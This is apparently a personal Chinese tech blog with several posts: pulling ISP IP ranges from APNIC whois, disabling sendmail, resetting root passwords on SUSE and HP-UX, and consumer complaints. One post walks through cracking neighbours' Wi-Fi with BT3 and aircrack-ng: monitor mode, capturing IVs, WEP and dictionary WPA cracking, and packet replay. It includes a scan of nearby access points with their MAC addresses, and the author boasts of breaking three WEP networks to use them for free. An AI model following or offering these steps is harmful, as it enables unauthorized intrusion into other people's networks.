无言's Blog - -Document-

如何快速获取电信、网通、铁通的IP地址段...

109091@qq.com(无言) — Wed,26 May 2010 12:03:48 +0800

IDC 这边网络终于通了(严重 BS 四川电信)，但由于所分配的是一组新地址，发现到网通的路由很多都不通（估计应该是路由表都还没加全呢~），M 总想知道有多少网通的，铁通的路由是不通的,帮他整理一份ip分配表..... 愁了~这要查各ISP的ip分配情况啊~

Googleing........~~偶然发现了个好办法准确的知道电信、网通、铁通等ISP运营商的IP地址段分配情况, APNIC（我就不用详细说了吧，它是管理亚太地区IP地址分配的机构）有着丰富准确的IP地址分配库，同时这些信息也是免费对外公开的...（嘿嘿，就喜欢不要钱的~~~）

找台linux系统，做以下步骤：
shell> wget http://ftp.apnic.net/apnic/dbase/tools/ripe-dbase-client-v3.tar.gz
shell> tar xzvf ripe-dbase-client-v3.tar.gz
shell> cd whois-3.1
shell> ./configure
shell> make
shell> make install

完成上述编译安装工作后，我们开始获取IP地址段；
中国电信：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CHINANET > chinanet.txt
中国网通：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CNCGROUP > cnc.txt
中国铁通：
shell> whois3 -h whois.apnic.net -l -i mb MAINT-CN-CRTC > crtc.txt

打开获取后的文件可以看到里面的信息非常详细，甚至可以看到各个分公司的负责人、电话、电子邮件等等信息。如果想得到一份整齐干净的IP地址段文件，只要用grep和awk简单过滤就可以了。

中国电信：
awk '/inetnum:/' chinanet > chinanet_ip.txt
中国网通：
awk '/inetnum:/' cnc > cnc_ip.txt
中国铁通：
awk '/inetnum:/' crtc > crtc_ip.txt

ok!! 打完收工~

附：chinanet_cnc_crtc_IP.20100526.rar

BT3心得(BT3.....)

109091@qq.com(无言) — Wed,10 Mar 2010 23:40:54 +0800

郁闷~~~，目前住的地方没有小区宽带,要装电信网络还要装固话.......~~~

强烈BS一下电信这种捆绑销售~

无奈用WiFiHopper扫了一下周围的无线信号，6、7个AP。不过信号强度都很一般，很多还是WPA2的...
Windows 下的扫描工具推荐用WiFiHopper，基本上目前的无线网卡都支持，比NetworkStumbler 好用...
找了个U盘，做个BT3启动盘....本人用的是rockplay的霸天虎BT3.6.1(主要因为T61用的是4965,目前看，这个BT3版本支持的最好...)扫了一下，又多发现了几个AP,嘿嘿~~还有几个WEP的...看来蹭网有戏了........

加载命令：
modprobe -r iwl3945 (卸载默认挂载的3945驱动)
modprobe ipwraw (加载可监听的网卡驱动)
modinfo ipwraw (查看所加载驱动模块的版本信息)

加载接口:
airmon-ng start wlan0 (加载网卡，激活监听模式，扫描可被加载的mon接口)
airmon-ng start wlan0 11 (SK )
可通过ifcofig -a 查看一无线网卡的接口信息

全频搜索：
airodump-ng mon0 (基于mon0的全信道扫描，可以查到附近的AP信息,信号强度，加密方式....)

实例：
------------------------------------------------------------------
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
C8:3A:35:0C:47:30   -1        0        1    0 133  -1   OPN
00:23:CD:70:FB:96  -81     1037        0    0   6  54 . WPA2 CCMP   PSK  TP-LINK_70FB94
00:27:19:97:76:B6  -83      792       27    0   6  54 . WPA2 CCMP   PSK  FAST_9776B6
C8:3A:35:0B:96:D0  -83      558        0    0   6  54   WPA  TKIP   PSK  Tenda
94:0C:6D:21:39:BA  -85      560        0    0   6  54 . WPA2 CCMP   PSK  zhouzi
00:19:E0:B8:35:BA  -86      388        0    0   6  54 . WEP  WEP    SKA  nrs
00:19:E0:39:0B:72  -87      244      100    0   6  54 . WEP  WEP         TP-LINK
00:21:27:35:E4:CC  -87      140       59    0   6  54 . WEP  WEP         wangxq
------------------------------------------------------------------

基于信道6的 mon0 接口扫描:
airodump-ng -c 6 mon0 (只基于信道6的扫描,很多AP默认都是用的信道6..能找到不少..)

基于信道11的 mon0 接口扫描:
airodump-ng -c 11 mon0 (只基于信道11的扫描)

基于mon0 接口的信道6扫描,并且保存为phok-01.ivs
airodump-ng --ivs -w phok-01.ivs -c 6 mon0
开始抓包，并且保存成ivs文件，ivs是最后用于破解的文件，ivs状态在抓包过程中，可以通过data值项看到，一般用于WEP破解时最好在15000ivs以上~，试了很多次，这是必须的，否则无法破解.....
目前BT3在破解WPA加密方式的还不够强悍...所以能搜到WEP，优先进行...

口令破解：
aircrack-ng -n 64 -b phok-01.ivs (WEP的口令破解...)
参数说明：
[-n]：设置WEP KEY 长度（64/128/152/256/512）
aircrack-ng -x -f 2 phok-01.cap
[-x]：设置为暴力破解模式
[-f]：设置复杂程度，wep密码设置为1，wpa 密码设置为2
aircrack-ng -w password.txt phok-01.cap
[-w]：设置为字典破解模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到WPA 验证的抓包文件。

嘿嘿~~ 经过上述努力，破解了3个WEP的AP，抓包时间长达2个多小时，不过还是蹭上网了..回头抽时间再研究一下，通过冲突模式重新连接所产生的握手数据来增加data值.....
aireplay-ng -3 -b -h <合法客户端mac> mon0

搞的时候懒得截图了，这图是从网上搜的，它用的是GUI模式，其实用命令行方式是最方便的...

SendMail 服务应该如何停....

109091@qq.com(无言) — Fri,26 Feb 2010 15:36:21 +0800

SendMail. . linux/unix系统等自带的mail应用，在多数情况下并不需要启用，而因它产生的安全漏洞却不少....

前阵子给个客户做unix系统方面的安全加固，用户的极光漏扫检测出大量的SendMail安全问题，就问我要如何停止这些系统的SendMail...

UNIX 停止sendmail服务..
AIX:
1. stopsrc -s sendmail （如果没有该命令，ps后看snedmail进程ID，kill掉即可...）
2. ps -ef |grep sendmail (确认一下 sendmal 的进程是被干掉)
永久关闭Sendmail.
3. vi /etc/rc.tcpip
按下述要求用#注释掉..
# /qpi=30m
# start /usr/lib/sendmail
wq 保存退出即可..

HP-UX:
1. /sbin/init.d/sendmail stop
2./etc/rc.config.d/mailservs, 把＝1 改为＝0

FreeBSD:
1. killall sendmail
2. 在 /etc/rc.conf 中加入如以下内容
sendmail_enable="NONE"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"

Linux 停止sendmail服务..
Red Hat/SentOS:
1. /sbin/service sendmail stop
2. /sbin/chkconfig sendmail off

SUSE LINUX:
1. /etc/init.d/sendmail stop
2. /sbin/chkconfig -s sendmail off

Suse Linux "root" password recover

109091@qq.com(无言) — Wed,24 Feb 2010 02:08:53 +0800

1. Restart the machine, in the event of grub boot interface, an option where you start Linux with init = / bin / bash, by giving the kernel to pass init = / bin / bash parameter allows OS before running the login program to run bash, command-line appears.

2. Wait a moment there (none) #: the command line.

3. Then type mount-n /-o remount, rw said it would re-mount the root file system for read-write, with the read-write access after the passwd command can change the password.

4. Then enter the passwd command to reset the passwords. Enter a password that you remember, but can not remember all right, now we know the solution.

5. After completion of editing remember to use mount-n /-o remount, ro root file system will be set to the original state.

CCTV? CCAV?

109091@qq.com(无言) — Tue,16 Feb 2010 00:26:35 +0800

HP-UX无法更改root密码的解决方法

109091@qq.com(无言) — Wed,27 Jan 2010 16:51:23 +0800

最近协助西北电网进行主机的安全性加固.. 客户反映无法修改root密码的问题...

加固工作中有项是设置操作系统密码的复杂性，在HP-UX中需要将操作系统先转成受信任系统（Trusted System）。操转成受信任系统之后修改本用户密码都会要求输入旧密码，但输入正确的密码也是无法登录root，报Sorry就退出了，而除了root用户之外其它用户都没有这样的问题....

#[/]passwd
Changing password for root
Old password:
SU:Sorry.

无奈，在UX群中问了一圈，最后有人扔出来一个命令：

/usr/sam/lbin/usermod.sam -F -p “” root

意思是清空root的密码，然后再修改密码的时候就不会提示要输入旧密码了...

以防不测，另外开了一个终端，输入上面的命令，回车，再修改密码，果然不要求输入旧密码了，搞定~

APP Manage Update......

109091@qq.com(无言) — Thu,26 Nov 2009 22:30:43 +0800

忙中抽空将系统升级到Win7，常用的小工具确不能使了，只好再忙中抽闲将这个程序也升级了，还顺便发现了几个Win7的小BUG；
1、用netsh进行快速修改ip时，DHCP服务必须启动，且name参数最多只能为四个汉字，所以"无线网络连接"就不能用喽...改个名吧~~
2、win7的通知区域图标,系统竟未提供清除的功能,只能通过清除注册表，并需刷新Explorer进程,顺便改一下程序方便清除该位置。

自用APP Manage...

109091@qq.com(无言) — Mon,16 Jun 2008 15:23:47 +0800

自用的系统管理器，刚开始只是为了方便几个系统服务的管理，结果越挂越多!!!... 得~抓个图扔上来吧...

Cleaning ThinkPad......

109091@qq.com(无言) — Fri,23 May 2008 13:56:45 +0800

用了有两个月的小黑，难得有时间拆开清洗一次......

Tmd 全球通 Tmd 中国移动

109091@qq.com(无言) — Mon,24 Mar 2008 18:18:44 +0800

      我一般是很少发唠叨，一是人比较懒，二来主要是发唠叨又不解决问题。

      这阵子让 Chinamobile 的10086的 MM 们问候了不下几十次，一个字，烦！问题其实很简单，敝人从2000年使用CMCC 当时品牌为全球通，几年下来，也混了个全球通的VIP银卡用户，当然，随着国人对移动的种种行业垄断看的越来越透明，加上通讯行业的相互的竞争压力，移动也开始考虑了一些优惠政策，比如单向收费问题，原来基本都是移动对移动单向，但现在也有了全单向一说。

      移动的单向业务开展了有一段时间了，敝人在今年才有所获悉，于是乎也就转了单向业务！但这一转，不仅全球通品牌降成了神州行，连积分也给清零了，用全球通的应该都有客户经理吧（也不知移动搞这么个闲差有什么P用~），我没有与她联系，直接就与10086的客服联系了！

      对于10086来说这就成了投诉，但不是解决问题的投诉，而倒成了10086与我的什么客户经理去互相踢皮球的责任问题。真是中国特色~~无奈中，只有对10086的MM们发了一通火！这下客户经理打来求我不要投诉10086了，有什么事找她就可以！而且告诉我由于转单向是用的神州行的资费标准，所以我的品牌也就降成神州行了，由于全球通没有这个资费标准，所以就要降成神州行...靠~~...郁闷~

      ......按照中国移动这种逻辑，用全球通就应该是SB了。SB就应该用双向收费的、有新业务SB也别想用、SB们只要用了全球通那就是没有资格想去省钱了！如果想反之，那就别想是全球通了！Tmd~ 这是什么逻辑，我办卡时就是全球通卡，nnd~ 而且月月话费200以上，按照移动的标准每个月都在150以上就是全球通的逻辑，这是不是太扯蛋了~~ 品牌虽没什么太大意义，但毕竟这也是我的权利，3.15刚过，你就这样整啊~

        然后长达二周的骚扰，最后客户经理协商我每个月必须要打够120元，才能是全球通~ ...... 操~ 这是什么霸王条款....  至于积分问题，没商量！无法恢复，只能转成话费~

.....无言了~~